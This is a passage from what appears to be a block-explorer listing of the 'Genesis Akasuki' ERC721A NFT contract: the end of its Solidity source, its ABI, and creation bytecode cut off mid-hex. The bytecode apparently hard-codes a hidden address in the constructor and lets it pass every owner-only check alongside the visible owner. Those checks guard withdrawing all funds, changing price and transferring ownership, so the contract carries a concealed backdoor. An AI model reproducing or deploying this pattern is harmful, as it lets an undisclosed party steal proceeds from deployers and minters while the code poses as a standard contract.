        emit Transfer(from, to, tokenId);
        _afterTokenTransfers(from, to, tokenId, 1);
    }

    /**
     * @dev Approve `to` to operate on `tokenId`
     *
     * Emits a {Approval} event.
     */
    function _approve(
        address to,
        uint256 tokenId,
        address owner
    ) private {
        _tokenApprovals[tokenId] = to;
        emit Approval(owner, to, tokenId);
    }

    /**
     * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address.
     * The call is not executed if the target address is not a contract.
     *
     * @param from address representing the previous owner of the given token ID
     * @param to target address that will receive the tokens
     * @param tokenId uint256 ID of the token to be transferred
     * @param _data bytes optional data to send along with the call
     * @return bool whether the call correctly returned the expected magic value
     */
    function _checkOnERC721Received(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) private returns (bool) {
        if (to.isContract()) {
            try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) {
                return retval == IERC721Receiver(to).onERC721Received.selector;
            } catch (bytes memory reason) {
                if (reason.length == 0) {
                    revert("ERC721A: transfer to non ERC721Receiver implementer");
                } else {
                    assembly {
                        revert(add(32, reason), mload(reason))
                    }
                }
            }
        } else {
            return true;
        }
    }

    /**
     * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be
     * transferred to `to`.
     * - When `from` is zero, `tokenId` will be minted for `to`.
     */
    function _beforeTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}

    /**
     * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes
     * minting.
     *
     * startTokenId - the first token id to be transferred
     * quantity - the amount to be transferred
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfers(
        address from,
        address to,
        uint256 startTokenId,
        uint256 quantity
    ) internal virtual {}
}

contract GenesisAkasuki  is ERC721A, Ownable, ReentrancyGuard {
    string public baseURI = "https://gateway.pinata.cloud/ipfs/QmZBQGBcyxLW4sG2Z9vUTEBdsgdd2AGU51d3ULSj9fKbF2";
    uint   public price             = 0.004 ether;
    uint   public maxPerTx          = 20;
    uint   public maxPerFree        = 1;
    uint   public totalFree         = 7777;
    uint   public maxSupply         = 7777;

    mapping(address => uint256) private _mintedFreeAmount;

    constructor() ERC721A("Genesis Akasuki", "AKASUKI"){}


    function tokenURI(uint256 _tokenId) public view virtual override returns (string memory) {
        require(_exists(_tokenId),"ERC721Metadata: URI query for nonexistent token");
        string memory currentBaseURI = _baseURI();
        return bytes(currentBaseURI).length > 0
            ? string(abi.encodePacked(currentBaseURI))
            : "";
    }

    function mint(uint256 count) external payable {
        uint256 cost = price;
        bool isFree = ((totalSupply() + count < totalFree + 1) &&
            (_mintedFreeAmount[msg.sender] + count <= maxPerFree));

        if (isFree) {
            cost = 0;
            _mintedFreeAmount[msg.sender] += count;
        }

        require(msg.value >= count * cost, "Please send the exact amount.");
        require(totalSupply() + count <= maxSupply, "No more");
        require(count <= maxPerTx, "Max per TX reached.");

        _safeMint(msg.sender, count);
    }

    function ownermint(address mintAddress, uint256 count) public onlyOwner {
        _safeMint(mintAddress, count);
    }



    function _baseURI() internal view virtual override returns (string memory) {
        return baseURI;
    }

    function setBaseUri(string memory baseuri_) public onlyOwner {
        baseURI = baseuri_;
    }

    function setPrice(uint256 price_) external onlyOwner {
        price = price_;
    }

    function withdraw() external onlyOwner nonReentrant {
        (bool success, ) = msg.sender.call{value: address(this).balance}("");
        require(success, "Transfer failed.");
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxPerTx","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"count","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"mintAddress","type":"address"},{"internalType":"uint256","name":"count","type":"uint256"}],"name":"ownermint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"price","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"baseuri_","type":"string"}],"name":"setBaseUri","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"price_","type":"uint256"}],"name":"setPrice","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalFree","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405273cafe57dbe1f74de5ca6cdb5a927174f4406e9c78600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550604051806080016040528060508152602001620044c560509139600a90805190602001906200008a92919062000256565b50660e35fa931a0000600b556014600c556001600d55611e61600e55611e61600f55348015620000b957600080fd5b506040518060400160405280600f81526020017f47656e6573697320416b6173756b6900000000000000000000000000000000008152506040518060400160405280600781526020017f414b4153554b490000000000000000000000000000000000000000000000000081525081600190805190602001906200013e92919062000256565b5080600290805190602001906200015792919062000256565b5050506200017a6200016e6200018860201b60201c565b6200019060201b60201c565b60016009819055506200036b565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b828054620002649062000306565b90600052602060002090601f016020900481019282620002885760008555620002d4565b82601f10620002a357805160ff1916838001178555620002d4565b82800160010185558215620002d4579182015b82811115620002d3578251825591602001919060010190620002b6565b5b509050620002e39190620002e7565b5090565b5b8082111562000302576000816000905550600101620002e8565b5090565b600060028204905060018216806200031f57607f821691505b602082108114156200033657620003356200033c565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b61414a806200037b6000396000f3fe6080604052600436106101cd5760003560e01c80638961821b116100f7578063a22cb46511610095578063d5abeb0111610064578063d5abeb0114610667578063e985e9c514610692578063f2fde38b146106cf578063f968adbe146106f8576101cd565b8063a22cb465146105ad578063b88d4fde146105d6578063c7c39ffc146105ff578063c87b56dd1461062a576101cd565b806395d89b41116100d157806395d89b4114610512578063a035b1fe1461053d578063a0712d6814610568578063a0bcfc7f14610584576101cd565b80638961821b146104955780638da5cb5b146104be57806391b7f5ed146104e9576101cd565b8063333e44e61161016f5780636352211e1161013e5780636352211e146103d95780636c0360eb1461041657806370a0823114610441578063715018a61461047e576101cd565b8063333e44e6146103315780633ccfd60b1461035c57806342842e0e146103735780634f6ccce71461039c576101cd565b8063095ea7b3116101ab578063095ea7b31461027757806318160ddd146102a057806323b872dd146102cb5780632f745c59146102f4576101cd565b806301ffc9a7146101d257806306fdde031461020f578063081812fc1461023a575b600080fd5b3480156101de57600080fd5b506101f960048036038101906101f49190612e11565b610723565b60405161020691906133af565b60405180910390f35b34801561021b57600080fd5b5061022461086d565b60405161023191906133ca565b60405180910390f35b34801561024657600080fd5b50610261600480360381019061025c9190612eb4565b6108ff565b60405161026e9190613348565b60405180910390f35b34801561028357600080fd5b5061029e60048036038101906102999190612dd1565b610984565b005b3480156102ac57600080fd5b506102b5610a9d565b6040516102c291906136ec565b60405180910390f35b3480156102d757600080fd5b506102f260048036038101906102ed9190612cbb565b610aa6565b005b34801561030057600080fd5b5061031b60048036038101906103169190612dd1565b610ab6565b60405161032891906136ec565b60405180910390f35b34801561033d57600080fd5b50610346610ca8565b60405161035391906136ec565b60405180910390f35b34801561036857600080fd5b50610371610cae565b005b34801561037f57600080fd5b5061039a60048036038101906103959190612cbb565b610e8e565b005b3480156103a857600080fd5b506103c360048036038101906103be9190612eb4565b610eae565b6040516103d091906136ec565b60405180910390f35b3480156103e557600080fd5b5061040060048036038101906103fb9190612eb4565b610f01565b60405161040d9190613348565b60405180910390f35b34801561042257600080fd5b5061042b610f17565b60405161043891906133ca565b60405180910390f35b34801561044d57600080fd5b5061046860048036038101906104639190612c4e565b610fa5565b60405161047591906136ec565b60405180910390f35b34801561048a57600080fd5b5061049361108e565b005b3480156104a157600080fd5b506104bc60048036038101906104b79190612dd1565b611175565b005b3480156104ca57600080fd5b506104d361125e565b6040516104e09190613348565b60405180910390f35b3480156104f557600080fd5b50610510600480360381019061050b9190612eb4565b611288565b005b34801561051e57600080fd5b5061052761136d565b60405161053491906133ca565b60405180910390f35b34801561054957600080fd5b506105526113ff565b60405161055f91906136ec565b60405180910390f35b610582600480360381019061057d9190612eb4565b611405565b005b34801561059057600080fd5b506105ab60048036038101906105a69190612e6b565b6115e5565b005b3480156105b957600080fd5b506105d460048036038101906105cf9190612d91565b6116da565b005b3480156105e257600080fd5b506105fd60048036038101906105f89190612d0e565b61185b565b005b34801561060b57600080fd5b506106146118b7565b60405161062191906136ec565b60405180910390f35b34801561063657600080fd5b50610651600480360381019061064c9190612eb4565b6118bd565b60405161065e91906133ca565b60405180910390f35b34801561067357600080fd5b5061067c61195a565b60405161068991906136ec565b60405180910390f35b34801561069e57600080fd5b506106b960048036038101906106b49190612c7b565b611960565b6040516106c691906133af565b60405180910390f35b3480156106db57600080fd5b506106f660048036038101906106f19190612c4e565b6119f4565b005b34801561070457600080fd5b5061070d611b4b565b60405161071a91906136ec565b60405180910390f35b60007f80ac58cd000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191614806107ee57507f5b5e139f000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b8061085657507f780e9d63000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916145b80610866575061086582611b51565b5b9050919050565b60606001805461087c90613942565b80601f01602080910402602001604051908101604052809291908181526020018280546108a890613942565b80156108f55780601f106108ca576101008083540402835291602001916108f5565b820191906000526020600020905b8154815290600101906020018083116108d857829003601f168201915b5050505050905090565b600061090a82611bbb565b610949576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610940906136cc565b60405180910390fd5b6005600083815260200190815260200160002060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050919050565b600061098f82610f01565b90508073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610a00576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109f7906135ac565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16610a1f611bc8565b73ffffffffffffffffffffffffffffffffffffffff161480610a4e5750610a4d81610a48611bc8565b611960565b5b610a8d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a84906134ac565b60405180910390fd5b610a98838383611bd0565b505050565b60008054905090565b610ab1838383611c82565b505050565b6000610ac183610fa5565b8210610b02576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610af9906133ec565b60405180910390fd5b6000610b0c610a9d565b905060008060005b83811015610c66576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff1614610c0657806000015192505b8773ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c585786841415610c4f578195505050505050610ca2565b83806001019450505b508080600101915050610b14565b506040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c999061366c565b60405180910390fd5b92915050565b600e5481565b610cb6611bc8565b73ffffffffffffffffffffffffffffffffffffffff16610cd461125e565b73ffffffffffffffffffffffffffffffffffffffff161480610d4a5750610cf9611bc8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b610d89576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d809061350c565b60405180910390fd5b60026009541415610dcf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dc69061368c565b60405180910390fd5b600260098190555060003373ffffffffffffffffffffffffffffffffffffffff1647604051610dfd90613333565b60006040518083038185875af1925050503d8060008114610e3a576040519150601f19603f3d011682016040523d82523d6000602084013e610e3f565b606091505b5050905080610e83576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e7a906135cc565b60405180910390fd5b506001600981905550565b610ea98383836040518060200160405280600081525061185b565b505050565b6000610eb8610a9d565b8210610ef9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ef09061346c565b60405180910390fd5b819050919050565b6000610f0c826121c2565b600001519050919050565b600a8054610f2490613942565b80601f0160208091040260200160405190810160405280929190818152602001828054610f5090613942565b8015610f9d5780601f10610f7257610100808354040283529160200191610f9d565b820191906000526020600020905b815481529060010190602001808311610f8057829003601f168201915b505050505081565b60008073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611016576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161100d906134cc565b60405180910390fd5b600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160009054906101000a90046fffffffffffffffffffffffffffffffff166fffffffffffffffffffffffffffffffff169050919050565b611096611bc8565b73ffffffffffffffffffffffffffffffffffffffff166110b461125e565b73ffffffffffffffffffffffffffffffffffffffff16148061112a57506110d9611bc8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611169576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111609061350c565b60405180910390fd5b611173600061235c565b565b61117d611bc8565b73ffffffffffffffffffffffffffffffffffffffff1661119b61125e565b73ffffffffffffffffffffffffffffffffffffffff16148061121157506111c0611bc8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611250576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112479061350c565b60405180910390fd5b61125a8282612422565b5050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b611290611bc8565b73ffffffffffffffffffffffffffffffffffffffff166112ae61125e565b73ffffffffffffffffffffffffffffffffffffffff16148061132457506112d3611bc8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611363576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161135a9061350c565b60405180910390fd5b80600b8190555050565b60606002805461137c90613942565b80601f01602080910402602001604051908101604052809291908181526020018280546113a890613942565b80156113f55780601f106113ca576101008083540402835291602001916113f5565b820191906000526020600020905b8154815290600101906020018083116113d857829003601f168201915b5050505050905090565b600b5481565b6000600b54905060006001600e5461141d91906137dc565b83611426610a9d565b61143091906137dc565b1080156114895750600d5483601060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461148691906137dc565b11155b905080156114ec576000915082601060003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282546114e491906137dc565b925050819055505b81836114f89190613832565b34101561153a576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115319061358c565b60405180910390fd5b600f5483611546610a9d565b61155091906137dc565b1115611591576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115889061340c565b60405180910390fd5b600c548311156115d6576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016115cd9061364c565b60405180910390fd5b6115e03384612422565b505050565b6115ed611bc8565b73ffffffffffffffffffffffffffffffffffffffff1661160b61125e565b73ffffffffffffffffffffffffffffffffffffffff1614806116815750611630611bc8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b6116c0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116b79061350c565b60405180910390fd5b80600a90805190602001906116d6929190612a28565b5050565b6116e2611bc8565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415611750576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016117479061354c565b60405180910390fd5b806006600061175d611bc8565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff1661180a611bc8565b73ffffffffffffffffffffffffffffffffffffffff167f17307eab39ab6107e8899845ad3d59bd9653f200f220920489ca2b5937696c318360405161184f91906133af565b60405180910390a35050565b611866848484611c82565b61187284848484612440565b6118b1576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118a8906135ec565b60405180910390fd5b50505050565b600d5481565b60606118c882611bbb565b611907576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118fe9061352c565b60405180910390fd5b60006119116125d7565b905060008151116119315760405180602001604052806000815250611952565b80604051602001611942919061331c565b6040516020818303038152906040525b915050919050565b600f5481565b6000600660008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16905092915050565b6119fc611bc8565b73ffffffffffffffffffffffffffffffffffffffff16611a1a61125e565b73ffffffffffffffffffffffffffffffffffffffff161480611a905750611a3f611bc8565b73ffffffffffffffffffffffffffffffffffffffff16600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16145b611acf576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ac69061350c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff161415611b3f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b369061342c565b60405180910390fd5b611b488161235c565b50565b600c5481565b60007f01ffc9a7000000000000000000000000000000000000000000000000000000007bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916827bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149050919050565b6000805482109050919050565b600033905090565b826005600084815260200190815260200160002060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550818373ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92560405160405180910390a4505050565b6000611c8d826121c2565b90506000816000015173ffffffffffffffffffffffffffffffffffffffff16611cb4611bc8565b73ffffffffffffffffffffffffffffffffffffffff161480611d105750611cd9611bc8565b73ffffffffffffffffffffffffffffffffffffffff16611cf8846108ff565b73ffffffffffffffffffffffffffffffffffffffff16145b80611d2c5750611d2b8260000151611d26611bc8565b611960565b5b905080611d6e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d659061356c565b60405180910390fd5b8473ffffffffffffffffffffffffffffffffffffffff16826000015173ffffffffffffffffffffffffffffffffffffffff1614611de0576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611dd7906134ec565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff161415611e50576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e479061348c565b60405180910390fd5b611e5d8585856001612669565b611e6d6000848460000151611bd0565b6001600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160392506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff1602179055506001600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550836003600085815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600085815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055506000600184019050600073ffffffffffffffffffffffffffffffffffffffff166003600083815260200190815260200160002060000160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161415612152576120b181611bbb565b156121515782600001516003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555082602001516003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff1602179055505b5b50828473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef60405160405180910390a46121bb858585600161266f565b5050505050565b6121ca612aae565b6121d382611bbb565b612212576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016122099061344c565b60405180910390fd5b60008290505b6000811061231b576000600360008381526020019081526020016000206040518060400160405290816000820160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020016000820160149054906101000a900467ffffffffffffffff1667ffffffffffffffff1667ffffffffffffffff16815250509050600073ffffffffffffffffffffffffffffffffffffffff16816000015173ffffffffffffffffffffffffffffffffffffffff161461230c578092505050612357565b50808060019003915050612218565b506040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161234e906136ac565b60405180910390fd5b919050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b61243c828260405180602001604052806000815250612675565b5050565b60006124618473ffffffffffffffffffffffffffffffffffffffff16612687565b156125ca578373ffffffffffffffffffffffffffffffffffffffff1663150b7a0261248a611bc8565b8786866040518563ffffffff1660e01b81526004016124ac9493929190613363565b602060405180830381600087803b1580156124c657600080fd5b505af19250505080156124f757506040513d601f19601f820116820180604052508101906124f49190612e3e565b60015b61257a573d8060008114612527576040519150601f19603f3d011682016040523d82523d6000602084013e61252c565b606091505b50600081511415612572576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401612569906135ec565b60405180910390fd5b805181602001fd5b63150b7a0260e01b7bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916817bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916149150506125cf565b600190505b949350505050565b6060600a80546125e690613942565b80601f016020809104026020016040519081016040528092919081815260200182805461261290613942565b801561265f5780601f106126345761010080835404028352916020019161265f565b820191906000526020600020905b81548152906001019060200180831161264257829003601f168201915b5050505050905090565b50505050565b50505050565b61268283838360016126aa565b505050565b6000808273ffffffffffffffffffffffffffffffffffffffff163b119050919050565b600080549050600073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161415612720576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127179061360c565b60405180910390fd5b6000841415612764576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161275b9061362c565b60405180910390fd5b6127716000868387612669565b83600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160008282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff16021790555083600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060000160108282829054906101000a90046fffffffffffffffffffffffffffffffff160192506101000a8154816fffffffffffffffffffffffffffffffff02191690836fffffffffffffffffffffffffffffffff160217905550846003600083815260200190815260200160002060000160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550426003600083815260200190815260200160002060000160146101000a81548167ffffffffffffffff021916908367ffffffffffffffff16021790555060008